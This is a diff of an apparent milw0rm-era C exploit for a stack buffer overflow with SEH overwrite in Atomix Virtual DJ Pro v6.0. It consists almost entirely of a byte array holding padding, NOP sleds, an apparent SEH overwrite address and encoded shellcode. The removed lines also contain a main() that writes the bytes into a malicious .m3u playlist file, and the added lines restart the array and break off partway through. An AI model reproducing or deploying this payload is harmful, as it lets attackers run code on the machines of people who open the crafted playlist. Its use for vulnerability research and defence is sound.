-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0xF0, 
-    0x69, 0x83, 0x7C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0xEB, 0x03, 0x59, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x49, 0x49, 0x49, 0x49, 
-    0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x51, 0x5A, 0x37, 
-    0x6A, 0x63, 0x58, 0x30, 0x42, 0x30, 0x50, 0x42, 0x6B, 0x42, 0x41, 0x73, 0x41, 0x42, 0x32, 0x42, 
-    0x41, 0x32, 0x41, 0x41, 0x30, 0x41, 0x41, 0x58, 0x38, 0x42, 0x42, 0x50, 0x75, 0x38, 0x69, 0x69, 
-    0x6C, 0x38, 0x68, 0x41, 0x54, 0x77, 0x70, 0x57, 0x70, 0x75, 0x50, 0x6E, 0x6B, 0x41, 0x55, 0x55, 
-    0x6C, 0x6E, 0x6B, 0x43, 0x4C, 0x66, 0x65, 0x41, 0x68, 0x45, 0x51, 0x58, 0x6F, 0x4C, 0x4B, 0x50, 
-    0x4F, 0x62, 0x38, 0x6E, 0x6B, 0x41, 0x4F, 0x31, 0x30, 0x36, 0x61, 0x4A, 0x4B, 0x41, 0x59, 0x6C, 
-    0x4B, 0x74, 0x74, 0x6E, 0x6B, 0x44, 0x41, 0x4A, 0x4E, 0x47, 0x41, 0x4B, 0x70, 0x6F, 0x69, 0x6C, 
-    0x6C, 0x4C, 0x44, 0x4B, 0x70, 0x43, 0x44, 0x76, 0x67, 0x4B, 0x71, 0x4A, 0x6A, 0x66, 0x6D, 0x66, 
-    0x61, 0x39, 0x52, 0x5A, 0x4B, 0x4A, 0x54, 0x75, 0x6B, 0x62, 0x74, 0x56, 0x44, 0x73, 0x34, 0x41, 
-    0x65, 0x4B, 0x55, 0x4E, 0x6B, 0x73, 0x6F, 0x54, 0x64, 0x53, 0x31, 0x6A, 0x4B, 0x35, 0x36, 0x6C, 
-    0x4B, 0x64, 0x4C, 0x30, 0x4B, 0x6C, 0x4B, 0x73, 0x6F, 0x57, 0x6C, 0x75, 0x51, 0x6A, 0x4B, 0x6C, 
-    0x4B, 0x37, 0x6C, 0x6C, 0x4B, 0x77, 0x71, 0x68, 0x6B, 0x4C, 0x49, 0x71, 0x4C, 0x51, 0x34, 0x43, 
-    0x34, 0x6B, 0x73, 0x46, 0x51, 0x79, 0x50, 0x71, 0x74, 0x4C, 0x4B, 0x67, 0x30, 0x36, 0x50, 0x4C, 
-    0x45, 0x4B, 0x70, 0x62, 0x58, 0x74, 0x4C, 0x6C, 0x4B, 0x53, 0x70, 0x56, 0x6C, 0x4E, 0x6B, 0x34, 
-    0x30, 0x47, 0x6C, 0x4E, 0x4D, 0x6C, 0x4B, 0x70, 0x68, 0x37, 0x78, 0x58, 0x6B, 0x53, 0x39, 0x6C, 
-    0x4B, 0x4F, 0x70, 0x6C, 0x70, 0x53, 0x30, 0x43, 0x30, 0x73, 0x30, 0x6C, 0x4B, 0x42, 0x48, 0x77, 
-    0x4C, 0x61, 0x4F, 0x44, 0x71, 0x6B, 0x46, 0x73, 0x50, 0x72, 0x76, 0x6B, 0x39, 0x5A, 0x58, 0x6F, 
-    0x73, 0x4F, 0x30, 0x73, 0x4B, 0x56, 0x30, 0x31, 0x78, 0x61, 0x6E, 0x6A, 0x78, 0x4B, 0x52, 0x74, 
-    0x33, 0x55, 0x38, 0x4A, 0x38, 0x69, 0x6E, 0x6C, 0x4A, 0x54, 0x4E, 0x52, 0x77, 0x79, 0x6F, 0x79, 
-    0x77, 0x42, 0x43, 0x50, 0x61, 0x70, 0x6C, 0x41, 0x73, 0x64, 0x6E, 0x51, 0x75, 0x52, 0x58, 0x31, 
-    0x75, 0x57, 0x70, 0x63, 0x72, 0x20, 0x4F, 0x66, 0x20, 0x54, 0x68, 0x65, 0x20, 0x44, 0x6F, 0x67, 
-    0x20, 0x41, 0x67, 0x61, 0x69, 0x6E, 0x20, 0x28, 0x32, 0x30, 0x30, 0x36, 0x29, 0x5B, 0x54, 0x2D, 
-    0x42, 0x6F, 0x79, 0x7A, 0x5D, 0x5C, 0x31, 0x33, 0x2E, 0x20, 0x44, 0x4D, 0x58, 0x20, 0x2D, 0x20, 
-    0x4C, 0x69, 0x66, 0x65, 0x20, 0x62, 0x65, 0x20, 0x6D, 0x79, 0x20, 0x53, 0x6F, 0x6E, 0x67, 0x2E, 
-    0x6D, 0x70, 0x33, 0x0D, 0x0A, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
-} ;
-
- int main ( int argc, char *argv[] )
-{ if ( argc < 2) 
-       fprintf ( stdout, "Usage is %s file.m3u\n", argv [0] );
-       fprintf ( stdout ,"\tAtomix.Virtual.DJ.Pro.v6.0 STACK BUFFER OVERFLOW ( SEH OVERWRITE )\n");
-       fprintf ( stdout , "\tCREDITS: fl0 fl0w\n");
-
-       FILE *f; f = fopen ( argv[1] , "wb" );  assert ( f != NULL ); fprintf ( f, rawData ); return 0; }
-
-// milw0rm.com [2009-06-03]
+#include 
+#include 
+#include 
+#include 
+#include 
+
+unsigned char rawData[] =
+{
+    0x23, 0x56, 0x69, 0x72, 0x74, 0x75, 0x61, 0x6C, 0x44, 0x4A, 0x20, 0x50, 0x6C, 0x61, 0x79, 0x6C, 
+    0x69, 0x73, 0x74, 0x0D, 0x0A, 0x23, 0x4D, 0x69, 0x78, 0x54, 0x79, 0x70, 0x65, 0x3D, 0x53, 0x6D, 
+    0x61, 0x72, 0x74, 0x0D, 0x0A, 0x49, 0x3A, 0x5C, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 
+    0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 0x59, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
+    0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 
